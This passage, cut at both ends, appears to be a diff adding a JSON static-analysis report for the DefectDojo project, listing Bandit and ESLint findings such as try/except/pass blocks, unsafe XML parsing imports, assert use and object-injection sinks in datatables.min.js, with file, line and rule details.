"dojo/templatetags/display_tags.py:1b7f212d248d62df8555cc93aea885b9f08e9546cd6e561610a322bb8c4e6042:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 302, + "end_line": 302, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/templatetags/display_tags.py:54c2ed9b789ed5da2d7a7f450cb6b96d836c21c17c852670bfac29544e6d4c3a:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 506, + "end_line": 506, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Standard pseudo-random generators are not suitable for security/cryptographic purposes.", + "cve": "dojo/templatetags/display_tags.py:f8fd75c0acde92adece2cd6186bde8494a4e1ca816ddaebffdf0377eeb63242c:B311", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 380, + "end_line": 380, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B311", + "value": "B311" + } + ] + }, + { + "category": "sast", + "message": "Using XMLSyntaxError to parse untrusted XML data is known to be vulnerable to XML attacks. Replace XMLSyntaxError with the equivalent defusedxml package.", + "cve": "dojo/tools/acunetix/parser_helper.py:d9c198cb448ea07d896bca670d26bbb050841a3420f3626498387815191b3203:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/acunetix/parser_helper.py", + "start_line": 3, + "end_line": 3, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/acunetix/parser_helper.py:df5fc3aac40e61145ad26a493655beb7ce8f1da45cb950aa4d510a638c89c340:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/acunetix/parser_helper.py", + "start_line": 2, + "end_line": 2, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/burp/parser.py:94a935dd00fd2a2ebdc42d605a46cb7f5f7fa43c3c2734534b4f4e0f75701f2b:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/burp/parser.py", + "start_line": 12, + "end_line": 12, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/kiuwan/parser.py:b644f1fec7a87fe4373190f8ebb8bbe7e7ebc669ca61c51dba06f61e0708a7e5:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/kiuwan/parser.py", + "start_line": 74, + "end_line": 74, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/microfocus_webinspect/parser.py:2ada57343510b672d4d963454207d279aec27e78a0582b311df3df29fb76a4f0:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/microfocus_webinspect/parser.py", + "start_line": 117, + "end_line": 117, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree with the equivalent defusedxml package.", + "cve": "dojo/tools/nmap/parser.py:bce553e3b09674e6a6125fb3a0cdcc621572e34ba7c1264dc3f6813c15d49be3:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/nmap/parser.py", + "start_line": 2, + "end_line": 2, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/openscap/parser.py:2ada57343510b672d4d963454207d279aec27e78a0582b311df3df29fb76a4f0:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/openscap/parser.py", + "start_line": 120, + "end_line": 120, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/openscap/parser.py:58e6a7cb38a5b6cddfb0df163d35a6b1156e367e418ad22a2401e62015b384d7:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/openscap/parser.py", + "start_line": 55, + "end_line": 55, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/qualys/parser.py:d4df7250950bfaaeb5d748ac0d79d837651eeb1e6f16e0c537dbadc27a428174:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/qualys/parser.py", + "start_line": 18, + "end_line": 18, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/qualys_webapp/parser.py:d4df7250950bfaaeb5d748ac0d79d837651eeb1e6f16e0c537dbadc27a428174:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/qualys_webapp/parser.py", + "start_line": 13, + "end_line": 13, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/sonarqube/parser.py:4f6a24a1086d429277287a8574e24b193f3638406e58e9a80e7d68eebb91024f:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sonarqube/parser.py", + "start_line": 1, + "end_line": 1, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "dojo/tools/sonarqube_api/importer.py:678f945f5af5f7299602ceb5390e50042ebd7cb63f2418b546fd7871b8d58645:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sonarqube_api/importer.py", + "start_line": 4, + "end_line": 4, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/testssl/parser.py:2ada57343510b672d4d963454207d279aec27e78a0582b311df3df29fb76a4f0:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/testssl/parser.py", + "start_line": 98, + "end_line": 98, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/wapiti/parser.py:2ada57343510b672d4d963454207d279aec27e78a0582b311df3df29fb76a4f0:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/wapiti/parser.py", + "start_line": 111, + "end_line": 111, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/wpscan/parser.py:9eefa5df69d920528497986083a686694f36618af3df510e67f574575e268077:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/wpscan/parser.py", + "start_line": 27, + "end_line": 27, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/tools/zap/parser.py:2c7efcf155541cf48317870607f8537f7a7da8f370001716cad6b18b031731d4:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/zap/parser.py", + "start_line": 154, + "end_line": 154, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Standard pseudo-random generators are not suitable for security/cryptographic purposes.", + "cve": "dojo/unittests/test_api_v1.py:2c944926db291952b7cca0ec9c28a004abb5ce5ccbcc054a1b077b8e745f8766:B311", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/unittests/test_api_v1.py", + "start_line": 28, + "end_line": 28, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B311", + "value": "B311" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "tests/Import_scanner_unit_test.py:0115b13a8c1742ecfce96e34469ff9906e5387b1934b2e4a3d51fdd4eb7aea0a:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 271, + "end_line": 271, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:23f1fc4b4c60fb3616d5bbe78930e8f2ceb581d4272ea8a8f9bf73c7ac982403:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 150, + "end_line": 150, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:5a098258f5abaff5e93231ba498f693ffcec0a983952e3320f6aea33d23c2f23:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 314, + "end_line": 314, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:646cbbbdfb6b839a4b412ce958d1622f2096e7870843a18b6e360ac9e028fa9c:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 82, + "end_line": 82, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:bdcd5dcb9e6e49f8ab0ead80ce7ae5e6245eee6bcb1ce82138c5d06be06a15f3:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 228, + "end_line": 228, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:e34fd58a8455d9fde85a5035b4aa68d5b730344f73ca68514595967ea6559d63:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 188, + "end_line": 188, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "tests/Import_scanner_unit_test.py:e6772c9a7cf3b0092303fc9ff187667c94830dca2219af89b84a7cb4013fde98:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/Import_scanner_unit_test.py", + "start_line": 112, + "end_line": 112, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Using XMLSyntaxError to parse untrusted XML data is known to be vulnerable to XML attacks. Replace XMLSyntaxError with the equivalent defusedxml package.", + "cve": "tests/validate_acunetix_scan_xml.py:c0563421814d4b3b21adec4248397d3ec2a5490a615e31732e235a32ada8236b:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/validate_acunetix_scan_xml.py", + "start_line": 2, + "end_line": 2, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "message": "Using etree to parse untrusted XML data is known to be vulnerable to XML attacks. Replace etree with the equivalent defusedxml package.", + "cve": "tests/validate_acunetix_scan_xml.py:c0563421814d4b3b21adec4248397d3ec2a5490a615e31732e235a32ada8236b:B410", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/validate_acunetix_scan_xml.py", + "start_line": 1, + "end_line": 1, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B410", + "value": "B410" + } + ] + }, + { + "category": "sast", + "name": "Found fs.openSync with non literal argument at index 0", + "message": "Found fs.openSync with non literal argument at index 0", + "description": "A variable is present in the filename argument of fs calls, this might allow an attacker to access anything on your system.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-non-literal-fs-filename", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 29, + "end_line": 29, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-non-literal-fs-filename", + "value": "security/detect-non-literal-fs-filename", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-non-literal-fs-filename" + } + ] + }, + { + "category": "sast", + "name": "Found fs.open with non literal argument at index 0", + "message": "Found fs.open with non literal argument at index 0", + "description": "A variable is present in the filename argument of fs calls, this might allow an attacker to access anything on your system.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-non-literal-fs-filename", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 349, + "end_line": 349, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-non-literal-fs-filename", + "value": "security/detect-non-literal-fs-filename", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-non-literal-fs-filename" + } + ] + }, + { + "category": "sast", + "name": "Found non-literal argument to RegExp Constructor", + "message": "Found non-literal argument to RegExp Constructor", + "description": "RegExp() called with a variable, this might allow an attacker to DOS your application with a long-running regular expression.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-non-literal-regexp", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 351, + "end_line": 351, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-non-literal-regexp", + "value": "security/detect-non-literal-regexp", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-non-literal-regexp" + } + ] + }, + { + "category": "sast", + "name": "Found non-literal argument to RegExp Constructor", + "message": "Found non-literal argument to RegExp Constructor", + "description": "RegExp() called with a variable, this might allow an attacker to DOS your application with a long-running regular expression.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-non-literal-regexp", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 29, + "end_line": 29, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-non-literal-regexp", + "value": "security/detect-non-literal-regexp", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-non-literal-regexp" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 62, + "end_line": 62, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 58, + "end_line": 58, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 59, + "end_line": 59, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 60, + "end_line": 60, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 61, + "end_line": 61, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 57, + "end_line": 57, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 63, + "end_line": 63, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 65, + "end_line": 65, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 66, + "end_line": 66, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 67, + "end_line": 67, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 68, + "end_line": 68, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": 